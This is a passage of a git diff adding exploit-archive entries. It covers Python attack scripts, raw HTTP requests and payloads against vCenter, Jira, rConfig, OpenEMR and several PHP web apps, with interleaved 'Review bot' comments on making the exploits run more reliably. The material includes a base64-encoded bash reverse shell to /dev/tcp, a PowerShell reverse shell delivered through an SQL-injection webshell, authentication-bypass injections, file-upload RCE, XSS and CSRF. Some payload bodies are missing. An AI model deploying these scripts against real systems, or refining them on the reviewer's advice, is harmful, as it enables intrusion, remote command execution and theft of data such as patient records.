shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=" + shell=base64.b64decode(shell).decode('utf-8') + shell=shell.replace('CUSTOM_IP',localip) + f=open("reverse.sh","w") + f.write(shell) + f.close() + # Move on with the payload + 
payload_file=tarfile.open('payload.tar','w') + myroute=getpath() + getprompt('Adding web backdoor to archive') + payload_file.add("shell4.jsp", myroute) + myroute=getpath("tmp/reverse.sh") + getprompt('Adding bash backdoor to archive') + payload_file.add("reverse.sh", myroute) + payload_file.close() + # cleaning up a little bit + os.unlink("reverse.sh") + os.unlink("shell4.jsp") + getprompt('Backdoor file just was created.') + +def launchexploit(ip): + res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) + if res.status_code == 200 and res.text == 'SUCCESS': + getprompt('Backdoor was uploaded successfully!') + return True + else: + getprompt('Backdoor failed to be uploaded. Target denied access.') + return False + +def testshell(ip): + getprompt('Looking for shell...') + shell_path="/ui/resources/shell4.jsp?cmd=uname+-a" + res=requests.get('https://' + ip + shell_path, verify=False, timeout=60) + if res.status_code==200: + getprompt('Shell was found!.') + response=res.text + if True: + getprompt('Shell is responsive.') + try: + response=re.findall("b>(.+)uname -a') + print(response) + except: + pass + return True + else: + getprompt('Sorry. Shell was not found.') + return False + +def opendoor(url): + time.sleep(3) + getprompt('Executing command.') + requests.get(url, verify=False, timeout=1800) + +def executebackdoor(ip, localip): + url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh" + t=threading.Thread(target=opendoor,args=(url,)) + t.start() + getprompt('Setting up socket '+localip+':443') + os.system('nc -lnvp 443') + +if len(sys.argv)== 1: + myargs.print_help(sys.stderr) + sys.exit(1) +createbackdoor(args.local) +uploaded=launchexploit(args.target) +if uploaded: + tested=testshell(args.target) + if tested: + executebackdoor(args.target, args.local) +getprompt("Execution completed!") \ No newline at end of file 
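Review bot: `testshell` calls `re.findall` but `re` is never imported, and the bare `except: pass` around it hides the resulting NameError, so 'Shell is responsive' is printed without the command output ever being parsed; add `import re` and narrow the handler to the parsing failure you expect. The regex argument on that line appears garbled in this listing (unbalanced quotes), which should be checked against the original file. `if True:` after the status check is a placeholder condition, `launchexploit` never closes the handle from `open('payload.tar', 'rb')`, and `payload.tar` is never removed although the two staging files are unlinked. The `37/0` segment in the default `getpath` target looks install-specific and is presumably why the README is referenced; a comment saying it may need adjusting would turn a silent 'Shell was not found' into an actionable hint.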
diff --git a/exploits/multiple/webapps/50380.txt b/exploits/multiple/webapps/50380.txt
new file mode 100644
index 000000000..ec2bdb62b
--- /dev/null
+++ b/exploits/multiple/webapps/50380.txt
@@ -0,0 +1,87 @@
+# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
+# Date: 2021-10-05
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira/download/data-center
+# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
+# Tested on: Kali Linux & Windows 10
+# CVE : CVE-2021-26086
+
+POC File #1 - web.xml
+
+GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+POC File #2 - seraph-config.xml
+
+GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #3 - decorators.xml
+
+GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+POC File #4 - /jira-webapp-dist/pom.properties
+
+GET 
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #5 - /jira-webapp-dist/pom.xml
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #6 - /atlassian-jira-webapp/pom.xml
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #7 - /atlassian-jira-webapp/pom.properties
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/49353.txt b/exploits/php/webapps/49353.txt
new file mode 100644
index 000000000..868a8b148
--- /dev/null
+++ b/exploits/php/webapps/49353.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
+# Date: 2020-12-27
+# Exploit Author: Kshitiz Raj (manitorpotterk)
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Step 1 - Go to url http://localhost/Resumes/login.html
+Step 2 - Enter Username :- ' or '1'='1'#
+Step 3 - Enter Password - anything
\ No newline at end of file
diff --git a/exploits/php/webapps/49665.txt b/exploits/php/webapps/49665.txt
new file mode 100644
index 000000000..4937fdda9
--- /dev/null
+++ b/exploits/php/webapps/49665.txt
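Review bot: None of the seven requests states what a successful response looks like, so a reader cannot distinguish a vulnerable host from a patched one; add a line after each request such as `Expected on a vulnerable host: HTTP 200 with the XML/properties body` and note what the patched versions listed in the header return instead, as observed. Every request carries `Accept-Encoding: gzip, deflate`, so when replayed from a raw socket or a tool without automatic decompression the body may arrive compressed and look like garbage; dropping that header makes the PoC easier to verify. `Host: 127.0.0.1:8080` should be called out as a placeholder for the target.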
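Review bot: The PoC never names the request or parameter that carries the injection; `login.html` is presumably a static form that posts elsewhere, and documenting that endpoint and the username field name is what makes the finding reproducible through a proxy rather than only through a browser. The payload `' or '1'='1'#` depends on `#` as a comment terminator, which is MySQL-specific; say so, or add a `-- ` variant for other backends.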
@@ -0,0 +1,70 @@ +# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) +# Date: 2021-03-17 +# Exploit Author: Murat ŞEKER +# Vendor Homepage: https://www.rconfig.com +# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip +# Version: rConfig v3.9.6 +# Install scripts : +# https://www.rconfig.com/downloads/scripts/install_rConfig.sh +# https://www.rconfig.com/downloads/scripts/centos7_install.sh +# https://www.rconfig.com/downloads/scripts/centos6_install.sh +# Tested on: centOS 7 +# Notes : If you want to reproduce in your lab environment follow those links : +# http://help.rconfig.com/gettingstarted/installation +# then +# http://help.rconfig.com/gettingstarted/postinstall + +# Description: +rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'. + +The following steps can be carried out in duplicating this vulnerability. + +- Login the rConfig application with your credentials. 
+- Repeat + +POST /lib/crud/vendors.crud.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254 +Content-Length: 36619 +Origin: https://localhost +Connection: close +Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref +Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b +Upgrade-Insecure-Requests: 1 +Cache-Control: no-transform + +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="vendorName" + +thisisrce +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="vendorLogo"; filename="file.php" +Content-Type: image/png + + +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="add" + +add +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="editid" + + +-----------------------------122590832918963661283831488254-- + + + +- Than go to http(s):///images/vendor/file.php + +Note: The file.php can be accessed without valid credentials. + + +If you change the to + +and navigate the http(s):///images/vendor/file.php?cmd=id + +The `id` command will execute on server. \ No newline at end of file diff --git a/exploits/php/webapps/49712.html b/exploits/php/webapps/49712.html new file mode 100644 index 000000000..36dd79bbd --- /dev/null +++ b/exploits/php/webapps/49712.html 
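Review bot: The captured request still carries the author's Burp Collaborator hostnames in `User-Agent` and `Referer` and a recorded `PHPSESSID`, so anyone replaying it verbatim will announce their activity to those third-party hosts and send a dead session; strip the collaborator domains and state that the cookie must come from a fresh login. `Content-Length: 36619` does not match the multipart body shown (the `file.php` part is empty in this listing), so a raw replay will stall waiting for bytes; drop the header and let the tool recompute it. `Origin: https://localhost` does not match `Host: localhost` over plain HTTP, which only matters if the application checks Origin. The sentence 'If you change the to' has lost the file contents it refers to, presumably the PHP one-liner; restoring it would make the final `?cmd=id` step reproducible.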
@@ -0,0 +1,21 @@ +# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery +# Exploit Author: Abhishek Joshi +# Date: March 25, 2021 +# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download +# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip +# Version: 0.1 +# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 +# Tested against: Firefox 78.7.0esr (64-bit) + +# Vulnerability Description: +# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site. + +## CSRF POST Form Method + +
+ + + + +
+ 
\ No newline at end of file
diff --git a/exploits/php/webapps/49713.txt b/exploits/php/webapps/49713.txt
new file mode 100644
index 000000000..cc03995d2
--- /dev/null
+++ b/exploits/php/webapps/49713.txt
@@ -0,0 +1,22 @@
+# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting
+# Exploit Author: George Tsimpidas
+# Date: 2021-03-25
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
+# Version : 1.0.0
+# Tested on: Kali Linux 2020.4
+# Category: Webapp
+
+# Description
+
+Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
+
+#PoC
+
+1. Login as admin : http://localhost/regis_inventory/index.php
+2. Visit : http://localhost/regis_inventory/item.php
+3. Click add a New Item and input your payload on "Generic Name" textbox.
+
+Payload :
+
+4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up
\ No newline at end of file
diff --git a/exploits/php/webapps/49783.py b/exploits/php/webapps/49783.py
new file mode 100755
index 000000000..f9e859aaf
--- /dev/null
+++ b/exploits/php/webapps/49783.py
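Review bot: The form body below '## CSRF POST Form Method' is empty in this listing, so the target action URL and the fields it submits cannot be reviewed; the header block should at least name the admin endpoint the form posts to and state that `customhs_js_content` is the field carrying the injected script, as the title implies. The description should also say whether the plugin's form lacks a nonce entirely or merely fails to validate one, since that determines whether the CMS's own CSRF protection could be reused as the fix.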
@@ -0,0 +1,44 @@ +# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2) +# Exploit Author: Vishwaraj Bhattrai +# Date: 18/04/2021 +# Vendor Homepage: https://www.rconfig.com/ +# Software Link: https://www.rconfig.com/ +# Vendor: rConfig +# Version: <= v3.9.6 +# Tested against Server Host: Linux+XAMPP + +import requests +import sys +s = requests.Session() + +host=sys.argv[1] #Enter the hostname +cmd=sys.argv[2] #Enter the command + +def exec_cmd(cmd,host): + print "[+]Executing command" + path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd) + response=requests.get(path) + print response.text + print "\n[+]You can access shell via below path" + print path + +def file_upload(cmd,host): + print "[+]Bypassing file upload" + burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php" + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"} + burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""} + burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; 
name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n" + requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data) + exec_cmd(cmd,host) + + +def login(host,cmd): + print "[+]Logging in" + burp0_url = "https://"+host+":443/lib/crud/userprocess.php" + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} + + burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin + response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data) + file_upload(cmd,host) + +login(host,cmd) \ No newline at end of file diff --git a/exploits/php/webapps/50017.py b/exploits/php/webapps/50017.py new file mode 100755 index 000000000..7f823be44 --- /dev/null +++ b/exploits/php/webapps/50017.py 
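Review bot: The upload and the execution path disagree: the multipart part is sent as `filename=\"banana.php\"` while `exec_cmd` requests `/images/vendor/x.php`, so unless the server renames uploads the shell is never reached; use one name for both, e.g. `filename=\"x.php\"`. `exec_cmd` interpolates `cmd` unencoded into the query string and calls the bare `requests.get` without `verify=False`, so commands containing spaces, `&` or `#` are truncated and targets with a self-signed certificate fail on verification; pass `params={'cmd': cmd}` and `verify=False`. Neither `login` nor `file_upload` inspects its response, so a wrong password or a rejected upload only surfaces as an HTML error page printed by `exec_cmd`; check the login redirect and the upload result before continuing. The file body between the part headers is empty in this listing and presumably held the PHP one-liner.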
@@ -0,0 +1,88 @@ +# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass +# Date 15.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip +# Version: All versions prior to 5.0.1.4 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-15152 +# CWE: CWE-287 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit + +''' +Description: +An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to +the registration page and modifying the requested url to access the desired page. Some +examples of pages in the portal directory that are accessible after browsing to the +registration page include: +- add_edit_event_user.php +- find_appt_popup_user.php +- get_allergies.php +- get_amendments.php +- get_lab_results.php +- get_medications.php +- get_patient_documents.php +- get_problems.php +- get_profile.php +- portal_payment.php +- messaging/messages.php +- messaging/secure_chat.php +- report/pat_ledger.php +- report/portal_custom_report.php +- report/portal_patient_report.php +Normally, access to these pages requires authentication as a patient. If a user were to visit +any of those pages unauthenticated, they would be redirected to the login page. +''' + + +''' +Import required modules: +''' +import requests +import argparse + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--Openemrpath', type=str) +my_parser.add_argument('-R', '--PathToGet', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.Openemrpath +pathtoread = args.PathToGet + + +''' +Check for vulnerability: +''' +# Check, if Registration portal is enabled. 
If it is not, this exploit can not work +session = requests.Session() +check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' +check_vuln = session.get(check_vuln_url).text +print('') +print('[*] Checking vulnerability: ') +print('') + +if "Enter email address to receive registration." in check_vuln: + print('[+] Host Vulnerable. Proceeding exploit') +else: + print('[-] Host is not Vulnerable: Registration for patients is not enabled') + +''' +Exploit: +''' +header = { + 'Referer': check_vuln_url +} +exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread +Exploit = session.get(exploit_url, headers=header) +print('') +print('[+] Results: ') +print('') +print(Exploit.text) +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50265.py b/exploits/php/webapps/50265.py new file mode 100755 index 000000000..de3603f08 --- /dev/null +++ b/exploits/php/webapps/50265.py 
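Review bot: The `else` branch that prints `[-] Host is not Vulnerable` does not stop the script, so the request to `exploit_url` is sent anyway and its output printed under `[+] Results:`; add `import sys` and end that branch with `sys.exit(1)`. None of the four `argparse` arguments is `required=True` and none has a `help=` string, so a missing flag surfaces as a `TypeError` from concatenating `None` into the URL rather than as a usage message. The URL is assembled by plain concatenation with a fixed `http://` scheme, so a comment stating whether `--Openemrpath` and `--PathToGet` are expected to start with `/` (the description lists portal pages without that prefix) would save users a confusing failed run.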
@@ -0,0 +1,75 @@ +# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS +# Date: 03/09/2021 +# Exploit Author: a-rey +# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14928 +# Version: v1.0 +# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import logging +import requests +import argparse + +BANNER = """ +╔═══════════════════════════════════════════════════════════════════╗ +║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║ +╚═══════════════════════════════════════════════════════════════════╝ + by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m + \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m + \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m + \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m + \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m + \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m +""" + + +def exploit(url:str, file:str) -> None: + if not os.path.exists(file): + logging.error(f'{file} does not exist?') + return + logging.info(f'reading {file} for XSS content ...') + with open(file, 'r') as f: + xssPayload = f.read() + logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...') + r = requests.post(url + '/classes/SystemSettings.php', + data={'about_us' : xssPayload}, + params={'f' : 'update_settings'}, + verify=False + ) + if not r.ok: + logging.error('HTTP request failed') + return + logging.info('checking for XSS payload on main page ...') + r = requests.get(url) + if xssPayload not in r.text: + logging.error(f'XSS injection failed? 
received: {r.text}') + logging.warning('maybe about.html is not writable?') + return + logging.success('XSS payload found on target website') + return + + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-u', '--url', help='website URL', type=str, required=True) + parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True) + parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.url, args.file) \ No newline at end of file diff --git a/exploits/php/webapps/50288.py b/exploits/php/webapps/50288.py new file mode 100755 index 000000000..90a206f5c --- /dev/null +++ b/exploits/php/webapps/50288.py 
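Review bot: The `#!/usr/bin/env python3` shebang sits on line 10, after the header comments, so it has no effect when the file is executed directly; move it (and the `-*- coding -*-` line) to the top. `exploit()` calls `logging.success`, which only exists because the `__main__` block monkey-patches it onto the `logging` module, so importing `exploit` from elsewhere raises `AttributeError`; a small module-level helper around `logging.getLogger(__name__).log(...)` would remove the hidden dependency. The POST passes `verify=False` while the follow-up `requests.get(url)` does not, so against an HTTPS target with a self-signed certificate the verification step fails for an unrelated reason; the two calls should agree, and a comment should say that `verify=False` also means the script cannot notice an interposed TLS endpoint. The file is read in text mode and its contents compared verbatim against `r.text`, which assumes the server stores and echoes the text without re-encoding — worth stating in a comment as an assumption.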
@@ -0,0 +1,77 @@ +# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection +# Date: 2021-08-13 +# Exploit Author: mari0x00 +# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 +# Version: 1.0 +# Tested on: Windows 10 + XAMPP + +#!/usr/bin/python3 + +import requests, socket, threading +import base64, time, sys + +print(('''###########################################################''',"red")) +print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) +print(('''###########################################################''',"red")) +print("") + +URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' +path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' +path = path.replace("\\", "\\\\") +rhost = input("Provide attacker IP: ") or "127.0.0.1" +rport = input("Provide attacker listening port: ") or "1337" + + +# sending webshell +payload = {"username": "admin' union select '' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} +requests.post(URL, data=payload) + + +def shell(rhost, rport): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.bind((rhost, int(rport))) + except socket.error as msg: + print("Bind failed. 
Error Code : " + str(msg[0]) + " Message " + msg[1]) + sys.exit() + + s.settimeout(5) + s.listen(5) + print('[+] Waiting for connection..') + + conn = False + command='' + + while conn == False: + try: + conn, addr = s.accept() + print("Got a connection from " + addr[0] + ":" + str(addr[1])) + conn.send('\n'.encode()) + time.sleep(1) + print(conn.recv(0x10000).decode()) + while(command != 'exit'): + command=input('') + conn.send((command + '\n').encode()) + time.sleep(.3) + res = conn.recv(0x10000) + print(res.decode()) + s.close() + sys.exit("[!] Program exited") + except socket.timeout: + pass + + +def start_shell(rhost, rport): + revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" + revshell = revshell.encode('ascii') + revshell = base64.b64encode(revshell) + revshell = revshell.decode('ascii') + connection = requests.get(URL+"/lol.php?cmd=" + revshell) + +print("[+] Starting to listen on port " + rport) +time.sleep(0.5) +threading.Thread(target=shell, args=(rhost, rport)).start() +time.sleep(2) +print("[+] Sending the reverse shell payload") +threading.Thread(target=start_shell, args=(rhost, rport)).start() \ No newline at end of file diff --git a/exploits/php/webapps/50307.txt b/exploits/php/webapps/50307.txt new file mode 100644 index 000000000..8aedae48d --- /dev/null +++ b/exploits/php/webapps/50307.txt 
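Review bot: The bind-failure handler in `shell()` is broken under Python 3: `socket.error` is an alias of `OSError`, which is not subscriptable, so `msg[0]` raises `TypeError` inside the `except` block and the real bind error is lost; use `msg.errno` and `msg.strerror` instead. The three banner `print((''' ... ''', "red"))` calls print a two-element tuple, apparently a leftover from a removed `colored()` wrapper; drop the second element. `rport` is only converted with `int(rport)` at bind time, so a non-numeric value fails late, and both the POST to `URL` and the GET in `start_shell()` ignore their responses, leaving the user with no indication of why nothing connected back. `time.sleep(2)` between starting the listener thread and the second thread is a timing guess rather than a synchronisation, which is worth a comment.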
@@ -0,0 +1,19 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
+# Exploit Author: Prunier Charles-Yves
+# Date: September 20, 2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
+# Tested on: Linux, windows
+# Vendor: oretnom23
+# Version: v1.0
+
+# Exploit Description:
+Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
+allowing the attacker to login with admin acount
+
+
+----- PoC: Authentication Bypass -----
+
+Administration Panel: http://localhost/expense_budget/admin/login.php
+
+Username: admin' or ''=' --
\ No newline at end of file
diff --git a/exploits/php/webapps/50308.txt b/exploits/php/webapps/50308.txt
new file mode 100644
index 000000000..7b235bf01
--- /dev/null
+++ b/exploits/php/webapps/50308.txt
